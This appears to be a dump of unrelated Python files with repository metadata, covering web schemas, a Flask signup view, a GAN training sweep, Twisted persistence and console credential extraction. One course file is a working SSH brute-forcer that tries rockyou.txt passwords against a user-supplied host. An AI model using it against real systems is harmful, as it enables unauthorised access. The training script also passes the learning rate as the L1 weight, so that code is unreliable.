'following': True if User_Following.get().filter(and_(User_Following.user==currentUser.id, User_Following.followed==obj.author.id)).first() is not None else False,
'mine': True if obj.author.id == currentUser.id else False,
'saved': True if Saved_Posts.get().filter(and_(Saved_Posts.user==currentUser.id, Saved_Posts.post==obj.id)).first() is not None else False
}
else:
return {
'liked': False,
'mine': False,
}
PostSchemaOnly = PostSchema(many=False)
class NewPostTagsSchema(ModelSchema):
class Meta:
model = Post_Tags
include_fk = True
sqla_session = db.session
class NewPostInfoSchema(ModelSchema):
tags = fields.Nested(NewPostTagsSchema, many=True)
class Meta:
model = Post_Info
sqla_session = db.session
class NewPostSchema(ModelSchema):
info = fields.Nested(NewPostInfoSchema, many=False)
class Meta:
model = Post
include_fk = True
sqla_session = db.session
| 3,354 | 5,279 | 460 |
9738f0d9c5f112205aaf26af33856c4224875478 | 1,552 | py | Python | ops_challenge/ops-challenge17/classes/ssh.py | jinwoov/Ops401 | 28db339e1edac31fb82640a76ebb01c4218984a0 | [
"MIT"
] | null | null | null | ops_challenge/ops-challenge17/classes/ssh.py | jinwoov/Ops401 | 28db339e1edac31fb82640a76ebb01c4218984a0 | [
"MIT"
] | null | null | null | ops_challenge/ops-challenge17/classes/ssh.py | jinwoov/Ops401 | 28db339e1edac31fb82640a76ebb01c4218984a0 | [
"MIT"
] | null | null | null | import paramiko
from time import sleep
import os
| 32.333333 | 103 | 0.554768 | import paramiko
from time import sleep
import os
class AuthSSH():
def __init__(self):
self.IP = self.get_IP()
self.user_name = self.userInfo()
def get_IP(self):
getIP = input("What ip do you want to shell into? ")
while(getIP == "" or getIP == None):
getIP = input("Please put legit IP ")
return getIP
def userInfo(self):
getUN = input("what is the username? ")
while(getUN == "" or getUN == None):
getUN = input("Please put legit username ")
return getUN
def ssh_connection(self):
# client = paramiko.Transport((self.IP, 22))
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.crackPW(client)
def crackPW(self,client):
textFile = os.path.abspath("./rockyou.txt")
file = open(textFile, "r")
readfile = file.read().splitlines()
print(self.user_name)
for line in readfile:
print(line)
try:
client.connect(hostname=self.IP, username=self.user_name, password=str(line), port= 22)
print(f"Login was successful to {self.IP} using {str(line)}, you are now in")
break
except:
print("Login failed :(")
sleep(.5)
continue
stdin, stdout, stderr = client.exec_command("ping -c 3 8.8.8.8")
print(stdout.read().splitlines())
client.close()
return
| 1,326 | -5 | 174 |
a8f8cf8794d61748699f9b0cce01ebd6f5e5d5ae | 1,038 | py | Python | app/v1/views/users.py | codeMarble254/storo-v1 | 6386afe9fc65a9f8fef86677b27d120b24dd6244 | [
"MIT"
] | null | null | null | app/v1/views/users.py | codeMarble254/storo-v1 | 6386afe9fc65a9f8fef86677b27d120b24dd6244 | [
"MIT"
] | null | null | null | app/v1/views/users.py | codeMarble254/storo-v1 | 6386afe9fc65a9f8fef86677b27d120b24dd6244 | [
"MIT"
] | 1 | 2018-12-09T20:43:35.000Z | 2018-12-09T20:43:35.000Z | '''This module manages all user endpoints(signup, login, logout etc)'''
from flask import jsonify, make_response
from flask_restful import Resource
from werkzeug.security import generate_password_hash
from .resources import Initialize
from ..models.user import User
from ..utils.users import Validation
class Signup(Resource, Initialize):
'''Handles user registration'''
@staticmethod
def post():
'''User signup endpoint'''
data = Initialize.get_json_data()
validate = Validation(data)
validate.check_empty_keys()
validate.check_empty_values()
validate.check_number_of_fields()
validate.check_signup_credentials()
validate.check_already_exists()
password = generate_password_hash(
data["password"], method='sha256').strip()
user = User(data["username"].strip(),
data["email"].lower().strip(), password)
user.save()
return make_response(jsonify({"message": "Account created successfully"}), 201)
| 35.793103 | 87 | 0.683044 | '''This module manages all user endpoints(signup, login, logout etc)'''
from flask import jsonify, make_response
from flask_restful import Resource
from werkzeug.security import generate_password_hash
from .resources import Initialize
from ..models.user import User
from ..utils.users import Validation
class Signup(Resource, Initialize):
    '''Handles user registration'''
    @staticmethod
    def post():
        '''User signup endpoint.

        Reads the JSON payload, runs the validation chain, hashes the
        password and persists the new user; responds 201 on success.
        '''
        data = Initialize.get_json_data()
        validate = Validation(data)
        # Structural checks first, then credential rules, then the
        # uniqueness check against existing accounts (presumably each
        # check aborts the request on failure -- confirm in Validation).
        validate.check_empty_keys()
        validate.check_empty_values()
        validate.check_number_of_fields()
        validate.check_signup_credentials()
        validate.check_already_exists()
        # NOTE(review): method='sha256' is a salted but unstretched hash
        # in werkzeug; consider 'pbkdf2:sha256' for new accounts.
        password = generate_password_hash(
            data["password"], method='sha256').strip()
        user = User(data["username"].strip(),
                    data["email"].lower().strip(), password)
        user.save()
        return make_response(jsonify({"message": "Account created successfully"}), 201)
| 0 | 0 | 0 |
f83dc914f243431baf9956b329f4b58d878d24e1 | 1,232 | py | Python | training.py | Laleee/poke-gan | d93506d249ac37fc971ca6504053a9d3461ebf84 | [
"MIT"
] | 2 | 2021-08-07T17:31:37.000Z | 2021-08-24T11:02:51.000Z | training.py | Laleee/poke-gan | d93506d249ac37fc971ca6504053a9d3461ebf84 | [
"MIT"
] | null | null | null | training.py | Laleee/poke-gan | d93506d249ac37fc971ca6504053a9d3461ebf84 | [
"MIT"
] | null | null | null | import torch
import wandb
from Trainer import Trainer
MAX_SUMMARY_IMAGES = 4
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
assert torch.cuda.is_available()
# LR = 2e-4
EPOCHS = 100
# BATCH_SIZE = 64
NUM_WORKERS = 4
# LAMBDA_L1 = 100
sweep_config = {
'method': 'bayes', # grid, random
'metric': {
'name': 'loss_g',
'goal': 'minimize'
},
'parameters': {
'lambda_l1': {
'values': [80, 90, 100, 110, 120, 130]
},
'batch_size': {
'values': [64]
},
'learning_rate': {
'values': [1e-5, 1e-4, 2e-4, 3e-4]
}
}
}
if __name__ == '__main__':
sweep_id = wandb.sweep(sweep_config, project="poke-gan")
wandb.agent(sweep_id, train_wrapper)
| 22.4 | 69 | 0.560877 | import torch
import wandb
from Trainer import Trainer
MAX_SUMMARY_IMAGES = 4
DEVICE = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
assert torch.cuda.is_available()
# LR = 2e-4
EPOCHS = 100
# BATCH_SIZE = 64
NUM_WORKERS = 4
# LAMBDA_L1 = 100
sweep_config = {
'method': 'bayes', # grid, random
'metric': {
'name': 'loss_g',
'goal': 'minimize'
},
'parameters': {
'lambda_l1': {
'values': [80, 90, 100, 110, 120, 130]
},
'batch_size': {
'values': [64]
},
'learning_rate': {
'values': [1e-5, 1e-4, 2e-4, 3e-4]
}
}
}
if __name__ == '__main__':
def train_wrapper():
wandb.init()
config = wandb.config
print(f'Config: {config}')
trainer = Trainer(
lr=config.learning_rate,
device=DEVICE,
batch_size=config.batch_size,
epochs=EPOCHS,
lambda_l1=config.learning_rate,
dataloader_num_workers=NUM_WORKERS,
max_summary_images=MAX_SUMMARY_IMAGES
)
trainer.train()
sweep_id = wandb.sweep(sweep_config, project="poke-gan")
wandb.agent(sweep_id, train_wrapper)
| 422 | 0 | 26 |
81c8c30dcc284203bcb75fe068adfc4c4550705e | 8,942 | py | Python | lib/twisted/persisted/styles.py | Kagami/kisa | 2597f67e519b8d66fec2684ff5a7726436bb029b | [
"CC0-1.0"
] | 7 | 2015-04-28T13:26:11.000Z | 2020-02-09T17:01:04.000Z | lib/twisted/persisted/styles.py | Kagami/kisa | 2597f67e519b8d66fec2684ff5a7726436bb029b | [
"CC0-1.0"
] | null | null | null | lib/twisted/persisted/styles.py | Kagami/kisa | 2597f67e519b8d66fec2684ff5a7726436bb029b | [
"CC0-1.0"
] | 3 | 2015-03-10T20:56:17.000Z | 2021-08-21T02:44:24.000Z | # -*- test-case-name: twisted.test.test_persisted -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Different styles of persisted objects.
"""
# System Imports
import types
import copy_reg
import copy
import inspect
import sys
try:
import cStringIO as StringIO
except ImportError:
import StringIO
# Twisted Imports
from twisted.python import log
from twisted.python import reflect
oldModules = {}
## First, let's register support for some stuff that really ought to
## be registerable...
def pickleMethod(method):
'support function for copy_reg to pickle method refs'
return unpickleMethod, (method.im_func.__name__,
method.im_self,
method.im_class)
def unpickleMethod(im_name,
im_self,
im_class):
'support function for copy_reg to unpickle method refs'
try:
unbound = getattr(im_class,im_name)
if im_self is None:
return unbound
bound = types.MethodType(unbound.im_func, im_self, im_class)
return bound
except AttributeError:
log.msg("Method",im_name,"not on class",im_class)
assert im_self is not None,"No recourse: no instance to guess from."
# Attempt a common fix before bailing -- if classes have
# changed around since we pickled this method, we may still be
# able to get it by looking on the instance's current class.
unbound = getattr(im_self.__class__,im_name)
log.msg("Attempting fixup with",unbound)
if im_self is None:
return unbound
bound = types.MethodType(unbound.im_func, im_self, im_self.__class__)
return bound
copy_reg.pickle(types.MethodType,
pickleMethod,
unpickleMethod)
def pickleModule(module):
'support function for copy_reg to pickle module refs'
return unpickleModule, (module.__name__,)
def unpickleModule(name):
'support function for copy_reg to unpickle module refs'
if oldModules.has_key(name):
log.msg("Module has moved: %s" % name)
name = oldModules[name]
log.msg(name)
return __import__(name,{},{},'x')
copy_reg.pickle(types.ModuleType,
pickleModule,
unpickleModule)
def pickleStringO(stringo):
'support function for copy_reg to pickle StringIO.OutputTypes'
return unpickleStringO, (stringo.getvalue(), stringo.tell())
if hasattr(StringIO, 'OutputType'):
copy_reg.pickle(StringIO.OutputType,
pickleStringO,
unpickleStringO)
if hasattr(StringIO, 'InputType'):
copy_reg.pickle(StringIO.InputType,
pickleStringI,
unpickleStringI)
class Ephemeral:
"""
This type of object is never persisted; if possible, even references to it
are eliminated.
"""
versionedsToUpgrade = {}
upgraded = {}
def requireUpgrade(obj):
"""Require that a Versioned instance be upgraded completely first.
"""
objID = id(obj)
if objID in versionedsToUpgrade and objID not in upgraded:
upgraded[objID] = 1
obj.versionUpgrade()
return obj
def _aybabtu(c):
"""
Get all of the parent classes of C{c}, not including C{c} itself, which are
strict subclasses of L{Versioned}.
The name comes from "all your base are belong to us", from the deprecated
L{twisted.python.reflect.allYourBase} function.
@param c: a class
@returns: list of classes
"""
# begin with two classes that should *not* be included in the
# final result
l = [c, Versioned]
for b in inspect.getmro(c):
if b not in l and issubclass(b, Versioned):
l.append(b)
# return all except the unwanted classes
return l[2:]
class Versioned:
"""
This type of object is persisted with versioning information.
I have a single class attribute, the int persistenceVersion. After I am
unserialized (and styles.doUpgrade() is called), self.upgradeToVersionX()
will be called for each version upgrade I must undergo.
For example, if I serialize an instance of a Foo(Versioned) at version 4
and then unserialize it when the code is at version 9, the calls::
self.upgradeToVersion5()
self.upgradeToVersion6()
self.upgradeToVersion7()
self.upgradeToVersion8()
self.upgradeToVersion9()
will be made. If any of these methods are undefined, a warning message
will be printed.
"""
persistenceVersion = 0
persistenceForgets = ()
def __getstate__(self, dict=None):
"""Get state, adding a version number to it on its way out.
"""
dct = copy.copy(dict or self.__dict__)
bases = _aybabtu(self.__class__)
bases.reverse()
bases.append(self.__class__) # don't forget me!!
for base in bases:
if base.__dict__.has_key('persistenceForgets'):
for slot in base.persistenceForgets:
if dct.has_key(slot):
del dct[slot]
if base.__dict__.has_key('persistenceVersion'):
dct['%s.persistenceVersion' % reflect.qual(base)] = base.persistenceVersion
return dct
def versionUpgrade(self):
"""(internal) Do a version upgrade.
"""
bases = _aybabtu(self.__class__)
# put the bases in order so superclasses' persistenceVersion methods
# will be called first.
bases.reverse()
bases.append(self.__class__) # don't forget me!!
# first let's look for old-skool versioned's
if self.__dict__.has_key("persistenceVersion"):
# Hacky heuristic: if more than one class subclasses Versioned,
# we'll assume that the higher version number wins for the older
# class, so we'll consider the attribute the version of the older
# class. There are obviously possibly times when this will
# eventually be an incorrect assumption, but hopefully old-school
# persistenceVersion stuff won't make it that far into multiple
# classes inheriting from Versioned.
pver = self.__dict__['persistenceVersion']
del self.__dict__['persistenceVersion']
highestVersion = 0
highestBase = None
for base in bases:
if not base.__dict__.has_key('persistenceVersion'):
continue
if base.persistenceVersion > highestVersion:
highestBase = base
highestVersion = base.persistenceVersion
if highestBase:
self.__dict__['%s.persistenceVersion' % reflect.qual(highestBase)] = pver
for base in bases:
# ugly hack, but it's what the user expects, really
if (Versioned not in base.__bases__ and
not base.__dict__.has_key('persistenceVersion')):
continue
currentVers = base.persistenceVersion
pverName = '%s.persistenceVersion' % reflect.qual(base)
persistVers = (self.__dict__.get(pverName) or 0)
if persistVers:
del self.__dict__[pverName]
assert persistVers <= currentVers, "Sorry, can't go backwards in time."
while persistVers < currentVers:
persistVers = persistVers + 1
method = base.__dict__.get('upgradeToVersion%s' % persistVers, None)
if method:
log.msg( "Upgrading %s (of %s @ %s) to version %s" % (reflect.qual(base), reflect.qual(self.__class__), id(self), persistVers) )
method(self)
else:
log.msg( 'Warning: cannot upgrade %s to version %s' % (base, persistVers) )
| 34 | 148 | 0.630508 | # -*- test-case-name: twisted.test.test_persisted -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Different styles of persisted objects.
"""
# System Imports
import types
import copy_reg
import copy
import inspect
import sys
try:
import cStringIO as StringIO
except ImportError:
import StringIO
# Twisted Imports
from twisted.python import log
from twisted.python import reflect
oldModules = {}
## First, let's register support for some stuff that really ought to
## be registerable...
def pickleMethod(method):
'support function for copy_reg to pickle method refs'
return unpickleMethod, (method.im_func.__name__,
method.im_self,
method.im_class)
def unpickleMethod(im_name,
im_self,
im_class):
'support function for copy_reg to unpickle method refs'
try:
unbound = getattr(im_class,im_name)
if im_self is None:
return unbound
bound = types.MethodType(unbound.im_func, im_self, im_class)
return bound
except AttributeError:
log.msg("Method",im_name,"not on class",im_class)
assert im_self is not None,"No recourse: no instance to guess from."
# Attempt a common fix before bailing -- if classes have
# changed around since we pickled this method, we may still be
# able to get it by looking on the instance's current class.
unbound = getattr(im_self.__class__,im_name)
log.msg("Attempting fixup with",unbound)
if im_self is None:
return unbound
bound = types.MethodType(unbound.im_func, im_self, im_self.__class__)
return bound
copy_reg.pickle(types.MethodType,
pickleMethod,
unpickleMethod)
def pickleModule(module):
'support function for copy_reg to pickle module refs'
return unpickleModule, (module.__name__,)
def unpickleModule(name):
'support function for copy_reg to unpickle module refs'
if oldModules.has_key(name):
log.msg("Module has moved: %s" % name)
name = oldModules[name]
log.msg(name)
return __import__(name,{},{},'x')
copy_reg.pickle(types.ModuleType,
pickleModule,
unpickleModule)
def pickleStringO(stringo):
'support function for copy_reg to pickle StringIO.OutputTypes'
return unpickleStringO, (stringo.getvalue(), stringo.tell())
def unpickleStringO(val, sek):
x = StringIO.StringIO()
x.write(val)
x.seek(sek)
return x
if hasattr(StringIO, 'OutputType'):
copy_reg.pickle(StringIO.OutputType,
pickleStringO,
unpickleStringO)
def pickleStringI(stringi):
return unpickleStringI, (stringi.getvalue(), stringi.tell())
def unpickleStringI(val, sek):
x = StringIO.StringIO(val)
x.seek(sek)
return x
if hasattr(StringIO, 'InputType'):
copy_reg.pickle(StringIO.InputType,
pickleStringI,
unpickleStringI)
class Ephemeral:
"""
This type of object is never persisted; if possible, even references to it
are eliminated.
"""
def __getstate__(self):
log.msg( "WARNING: serializing ephemeral %s" % self )
import gc
if '__pypy__' not in sys.builtin_module_names:
if getattr(gc, 'get_referrers', None):
for r in gc.get_referrers(self):
log.msg( " referred to by %s" % (r,))
return None
def __setstate__(self, state):
log.msg( "WARNING: unserializing ephemeral %s" % self.__class__ )
self.__class__ = Ephemeral
versionedsToUpgrade = {}
upgraded = {}
def doUpgrade():
global versionedsToUpgrade, upgraded
for versioned in versionedsToUpgrade.values():
requireUpgrade(versioned)
versionedsToUpgrade = {}
upgraded = {}
def requireUpgrade(obj):
"""Require that a Versioned instance be upgraded completely first.
"""
objID = id(obj)
if objID in versionedsToUpgrade and objID not in upgraded:
upgraded[objID] = 1
obj.versionUpgrade()
return obj
def _aybabtu(c):
"""
Get all of the parent classes of C{c}, not including C{c} itself, which are
strict subclasses of L{Versioned}.
The name comes from "all your base are belong to us", from the deprecated
L{twisted.python.reflect.allYourBase} function.
@param c: a class
@returns: list of classes
"""
# begin with two classes that should *not* be included in the
# final result
l = [c, Versioned]
for b in inspect.getmro(c):
if b not in l and issubclass(b, Versioned):
l.append(b)
# return all except the unwanted classes
return l[2:]
class Versioned:
"""
This type of object is persisted with versioning information.
I have a single class attribute, the int persistenceVersion. After I am
unserialized (and styles.doUpgrade() is called), self.upgradeToVersionX()
will be called for each version upgrade I must undergo.
For example, if I serialize an instance of a Foo(Versioned) at version 4
and then unserialize it when the code is at version 9, the calls::
self.upgradeToVersion5()
self.upgradeToVersion6()
self.upgradeToVersion7()
self.upgradeToVersion8()
self.upgradeToVersion9()
will be made. If any of these methods are undefined, a warning message
will be printed.
"""
persistenceVersion = 0
persistenceForgets = ()
def __setstate__(self, state):
versionedsToUpgrade[id(self)] = self
self.__dict__ = state
def __getstate__(self, dict=None):
"""Get state, adding a version number to it on its way out.
"""
dct = copy.copy(dict or self.__dict__)
bases = _aybabtu(self.__class__)
bases.reverse()
bases.append(self.__class__) # don't forget me!!
for base in bases:
if base.__dict__.has_key('persistenceForgets'):
for slot in base.persistenceForgets:
if dct.has_key(slot):
del dct[slot]
if base.__dict__.has_key('persistenceVersion'):
dct['%s.persistenceVersion' % reflect.qual(base)] = base.persistenceVersion
return dct
def versionUpgrade(self):
"""(internal) Do a version upgrade.
"""
bases = _aybabtu(self.__class__)
# put the bases in order so superclasses' persistenceVersion methods
# will be called first.
bases.reverse()
bases.append(self.__class__) # don't forget me!!
# first let's look for old-skool versioned's
if self.__dict__.has_key("persistenceVersion"):
# Hacky heuristic: if more than one class subclasses Versioned,
# we'll assume that the higher version number wins for the older
# class, so we'll consider the attribute the version of the older
# class. There are obviously possibly times when this will
# eventually be an incorrect assumption, but hopefully old-school
# persistenceVersion stuff won't make it that far into multiple
# classes inheriting from Versioned.
pver = self.__dict__['persistenceVersion']
del self.__dict__['persistenceVersion']
highestVersion = 0
highestBase = None
for base in bases:
if not base.__dict__.has_key('persistenceVersion'):
continue
if base.persistenceVersion > highestVersion:
highestBase = base
highestVersion = base.persistenceVersion
if highestBase:
self.__dict__['%s.persistenceVersion' % reflect.qual(highestBase)] = pver
for base in bases:
# ugly hack, but it's what the user expects, really
if (Versioned not in base.__bases__ and
not base.__dict__.has_key('persistenceVersion')):
continue
currentVers = base.persistenceVersion
pverName = '%s.persistenceVersion' % reflect.qual(base)
persistVers = (self.__dict__.get(pverName) or 0)
if persistVers:
del self.__dict__[pverName]
assert persistVers <= currentVers, "Sorry, can't go backwards in time."
while persistVers < currentVers:
persistVers = persistVers + 1
method = base.__dict__.get('upgradeToVersion%s' % persistVers, None)
if method:
log.msg( "Upgrading %s (of %s @ %s) to version %s" % (reflect.qual(base), reflect.qual(self.__class__), id(self), persistVers) )
method(self)
else:
log.msg( 'Warning: cannot upgrade %s to version %s' % (base, persistVers) )
| 908 | 0 | 173 |
ab78ba6ea21ee758e3dc2d6ed113494570f40da1 | 423 | py | Python | example_app/urls.py | dxillar/django-nepali-datetime-field | 170109103b6dcbcf3d88e518097638edd8dc92fa | [
"MIT"
] | 2 | 2021-07-27T09:31:20.000Z | 2022-01-22T04:51:11.000Z | example_app/urls.py | dxillar/django-nepali-datetime-field | 170109103b6dcbcf3d88e518097638edd8dc92fa | [
"MIT"
] | 1 | 2021-08-16T09:37:43.000Z | 2021-08-16T11:42:46.000Z | example_app/urls.py | dxillar/django-nepali-datetime-field | 170109103b6dcbcf3d88e518097638edd8dc92fa | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
urlpatterns = [
path('example/', views.ExampleListView.as_view(), name='example_list'),
path('example/create', views.ExampleCreateView.as_view(), name='example_create'),
path('example/<int:pk>/update/', views.ExampleUpdateView.as_view(), name='example_update'),
path('example/<int:pk>/delete/', views.ExampleDeleteView.as_view(), name='example_delete'),
]
| 38.454545 | 95 | 0.723404 | from django.urls import path
from . import views
urlpatterns = [
path('example/', views.ExampleListView.as_view(), name='example_list'),
path('example/create', views.ExampleCreateView.as_view(), name='example_create'),
path('example/<int:pk>/update/', views.ExampleUpdateView.as_view(), name='example_update'),
path('example/<int:pk>/delete/', views.ExampleDeleteView.as_view(), name='example_delete'),
]
| 0 | 0 | 0 |
f9accf0185672edab98da0816005b9615b99845e | 1,147 | py | Python | ElectronicCommerce/test_case/models/driver.py | Pactortester/JingDongTestProject | b30bb987db9357f0812be64170c31b10a4cceee0 | [
"MIT"
] | null | null | null | ElectronicCommerce/test_case/models/driver.py | Pactortester/JingDongTestProject | b30bb987db9357f0812be64170c31b10a4cceee0 | [
"MIT"
] | null | null | null | ElectronicCommerce/test_case/models/driver.py | Pactortester/JingDongTestProject | b30bb987db9357f0812be64170c31b10a4cceee0 | [
"MIT"
] | 1 | 2021-09-07T02:06:01.000Z | 2021-09-07T02:06:01.000Z | from threading import Thread
from selenium.webdriver import Remote
from selenium import webdriver
# start browser
"""
if __name__ == '__main__':
host_list = {'127.0.0.1:4444': 'internet explorer', '127.0.0.1:5555': 'chrome'}
threads = []
files = range(len(host_list))
for host_name, browser_name in host_list.items():
t = Thread(target=browser, args=(host_name, browser_name))
threads.append(t)
for i in files:
threads[i].start()
for i in files:
threads[i].join()
"""
if __name__ == '__main__':
driver = browser()
driver.get("http://www.baidu.com")
driver.quit()
| 27.97561 | 97 | 0.62075 | from threading import Thread
from selenium.webdriver import Remote
from selenium import webdriver
# start browser
def browser():
# browser (chrome, firefox, ie ...)
driver = webdriver.Chrome()
# driver = webdriver.Ie()
# driver = webdriver.Firefox()
# dc = {'platform': 'ANY', 'browserName': 'chrome', 'version': '', 'javascriptEnabled': True}
# dc = {'browserName': dc_browser}
# host = '127.0.0.1:4444' # host: port (default: 127.0.0.1:4444)
# dc = {'browserName': 'chrome'}
# driver = Remote(command_executor='http://' + host + '/wd/hub', desired_capabilities=dc)
return driver
"""
if __name__ == '__main__':
host_list = {'127.0.0.1:4444': 'internet explorer', '127.0.0.1:5555': 'chrome'}
threads = []
files = range(len(host_list))
for host_name, browser_name in host_list.items():
t = Thread(target=browser, args=(host_name, browser_name))
threads.append(t)
for i in files:
threads[i].start()
for i in files:
threads[i].join()
"""
if __name__ == '__main__':
driver = browser()
driver.get("http://www.baidu.com")
driver.quit()
| 487 | 0 | 22 |
e0274a74ce7936e51ee707d9e4845ace56c95ffb | 940 | py | Python | lagom/metric/returns.py | zuoxingdong/lagom | 3b6710804dbc79c6dffb369ac87c68f4055ab6cd | [
"MIT"
] | 383 | 2018-07-11T17:43:10.000Z | 2022-01-24T08:46:23.000Z | lagom/metric/returns.py | LorinChen/lagom | 273bb7f5babb1f250f6dba0b5f62c6614f301719 | [
"MIT"
] | 90 | 2018-07-11T23:51:45.000Z | 2021-12-16T08:56:42.000Z | lagom/metric/returns.py | LorinChen/lagom | 273bb7f5babb1f250f6dba0b5f62c6614f301719 | [
"MIT"
] | 32 | 2018-07-12T18:21:03.000Z | 2021-09-15T05:47:48.000Z | import numpy as np
from lagom.transform import geometric_cumsum
from lagom.utils import numpify
def bootstrapped_returns(gamma, rewards, last_V, reach_terminal):
r"""Return (discounted) accumulated returns with bootstrapping for a
batch of episodic transitions.
Formally, suppose we have all rewards :math:`(r_1, \dots, r_T)`, it computes
.. math::
Q_t = r_t + \gamma r_{t+1} + \dots + \gamma^{T - t} r_T + \gamma^{T - t + 1} V(s_{T+1})
.. note::
The state values for terminal states are masked out as zero !
"""
last_V = numpify(last_V, np.float32).item()
if reach_terminal:
out = geometric_cumsum(gamma, np.append(rewards, 0.0))
else:
out = geometric_cumsum(gamma, np.append(rewards, last_V))
return out[0, :-1].astype(np.float32)
| 29.375 | 95 | 0.647872 | import numpy as np
from lagom.transform import geometric_cumsum
from lagom.utils import numpify
def returns(gamma, rewards):
return geometric_cumsum(gamma, rewards)[0, :].astype(np.float32)
def bootstrapped_returns(gamma, rewards, last_V, reach_terminal):
r"""Return (discounted) accumulated returns with bootstrapping for a
batch of episodic transitions.
Formally, suppose we have all rewards :math:`(r_1, \dots, r_T)`, it computes
.. math::
Q_t = r_t + \gamma r_{t+1} + \dots + \gamma^{T - t} r_T + \gamma^{T - t + 1} V(s_{T+1})
.. note::
The state values for terminal states are masked out as zero !
"""
last_V = numpify(last_V, np.float32).item()
if reach_terminal:
out = geometric_cumsum(gamma, np.append(rewards, 0.0))
else:
out = geometric_cumsum(gamma, np.append(rewards, last_V))
return out[0, :-1].astype(np.float32)
| 76 | 0 | 23 |
7bb94c472fc1b0918cc565d949b96695ed473f73 | 689 | py | Python | generate_console_data.py | MarioPossamato/MariOver | 088adc0c0c9350b5a426093d2efbfce7edf28b24 | [
"MIT"
] | 14 | 2022-03-06T22:25:44.000Z | 2022-03-22T19:49:20.000Z | generate_console_data.py | MarioPossamato/MariOver | 088adc0c0c9350b5a426093d2efbfce7edf28b24 | [
"MIT"
] | 1 | 2022-03-15T06:28:05.000Z | 2022-03-17T09:33:12.000Z | generate_console_data.py | MarioPossamato/MariOver | 088adc0c0c9350b5a426093d2efbfce7edf28b24 | [
"MIT"
] | 1 | 2022-03-09T09:35:21.000Z | 2022-03-09T09:35:21.000Z | from nintendo.dauth import LATEST_VERSION
username = None
password = None
with open("ConsoleData/8000000000000010", mode="rb") as file:
data = file.read()
username_bytes = bytearray(data[0x00064020:0x00064028])
username_bytes.reverse()
username = "0x" + username_bytes.hex().upper()
password = data[0x00064028:0x00064050].decode("ascii")
with open("webserver_args.json", mode="w") as file:
args = """{
"system_version": %d,
"user_id": "%s",
"password": "%s",
"keys": "./ConsoleData/prod.keys",
"prodinfo": "./ConsoleData/PRODINFO.dec",
"ticket": "./ConsoleData/SUPER MARIO MAKER 2 v0 (01009B90006DC000) (BASE).tik"
}""" % (LATEST_VERSION, username, password)
file.write(args) | 34.45 | 79 | 0.711176 | from nintendo.dauth import LATEST_VERSION
username = None
password = None
with open("ConsoleData/8000000000000010", mode="rb") as file:
data = file.read()
username_bytes = bytearray(data[0x00064020:0x00064028])
username_bytes.reverse()
username = "0x" + username_bytes.hex().upper()
password = data[0x00064028:0x00064050].decode("ascii")
with open("webserver_args.json", mode="w") as file:
args = """{
"system_version": %d,
"user_id": "%s",
"password": "%s",
"keys": "./ConsoleData/prod.keys",
"prodinfo": "./ConsoleData/PRODINFO.dec",
"ticket": "./ConsoleData/SUPER MARIO MAKER 2 v0 (01009B90006DC000) (BASE).tik"
}""" % (LATEST_VERSION, username, password)
file.write(args) | 0 | 0 | 0 |
61734459fe44e90b6292840ec0c69472f8b973e6 | 11,811 | py | Python | ALTANTIS/world/world.py | finnbar/ALTANTIS | 8754fcec1845b9b2dcce478554f25d2a50f873b4 | [
"MIT"
] | null | null | null | ALTANTIS/world/world.py | finnbar/ALTANTIS | 8754fcec1845b9b2dcce478554f25d2a50f873b4 | [
"MIT"
] | null | null | null | ALTANTIS/world/world.py | finnbar/ALTANTIS | 8754fcec1845b9b2dcce478554f25d2a50f873b4 | [
"MIT"
] | 1 | 2020-08-30T16:21:10.000Z | 2020-08-30T16:21:10.000Z | """
Deals with the world map, which submarines explore.
"""
import string
from functools import reduce
from ALTANTIS.utils.text import list_to_and_separated
from ALTANTIS.utils.direction import reverse_dir, directions
from ALTANTIS.utils.consts import X_LIMIT, Y_LIMIT
from ALTANTIS.world.validators import InValidator, NopValidator, TypeValidator, BothValidator, LenValidator, RangeValidator
from ALTANTIS.world.consts import ATTRIBUTES, WEATHER, WALL_STYLES
import random
from typing import List, Optional, Tuple, Any, Dict, Collection
undersea_map = [[Cell() for _ in range(Y_LIMIT)] for _ in range(X_LIMIT)]
def map_to_dict() -> Dict[str, Any]:
"""
Converts our map to dict form. Since each of our map entries can be
trivially converted into dicts, we just convert them individually.
We also append a class identifier so they can be recreated correctly.
"""
undersea_map_dicts : List[List[Dict[str, Any]]] = [[{} for _ in range(Y_LIMIT)] for _ in range(X_LIMIT)]
for i in range(X_LIMIT):
for j in range(Y_LIMIT):
undersea_map_dicts[i][j] = undersea_map[i][j]._to_dict()
return {"map": undersea_map_dicts, "x_limit": X_LIMIT, "y_limit": Y_LIMIT}
def map_from_dict(dictionary: Dict[str, Any]):
"""
Takes a triple generated by map_to_dict and overwrites our map with it.
"""
global X_LIMIT, Y_LIMIT, undersea_map
X_LIMIT = dictionary["x_limit"]
Y_LIMIT = dictionary["y_limit"]
map_dicts = dictionary["map"]
undersea_map_new = [[Cell._from_dict(map_dicts[x][y]) for y in range(Y_LIMIT)] for x in range(X_LIMIT)]
undersea_map = undersea_map_new
| 39.634228 | 207 | 0.605283 | """
Deals with the world map, which submarines explore.
"""
import string
from functools import reduce
from ALTANTIS.utils.text import list_to_and_separated
from ALTANTIS.utils.direction import reverse_dir, directions
from ALTANTIS.utils.consts import X_LIMIT, Y_LIMIT
from ALTANTIS.world.validators import InValidator, NopValidator, TypeValidator, BothValidator, LenValidator, RangeValidator
from ALTANTIS.world.consts import ATTRIBUTES, WEATHER, WALL_STYLES
import random
from typing import List, Optional, Tuple, Any, Dict, Collection
class Cell():
# A dictionary of validators to apply to the attributes
VALIDATORS = {
"weather": InValidator(WEATHER.keys()),
"docking": BothValidator(LenValidator(0, 255), TypeValidator(str)),
"wallstyle": InValidator(WALL_STYLES),
"hiddenness": BothValidator(TypeValidator(int), RangeValidator(0, 10))
}
def __init__(self):
# The items this square contains.
self.treasure = []
# Fundamentally describes how the square acts. These are described
# throughout the class. A cell with no attributes acts like Empty from
# the previous version - has no extra difficulty etc.
self.attributes = {}
# The list of subs for whom the hiddenness attribute no longer affects the rendering of the map
self.explored = set([])
@classmethod
def _from_dict(cls, serialisation):
p = cls()
p.treasure = list(serialisation['treasure'])
p.attributes = dict(serialisation['attributes'])
if "explored" in serialisation:
p.explored = set(serialisation["explored"])
return p
